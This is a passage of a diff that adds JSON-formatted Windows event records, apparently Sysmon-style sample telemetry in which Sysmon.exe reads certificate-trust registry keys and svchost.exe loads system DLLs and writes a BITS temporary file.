"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ResourcePolicyClient.dll", + "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "file", + "file_name": "BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "file", + "file_name": 
"BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 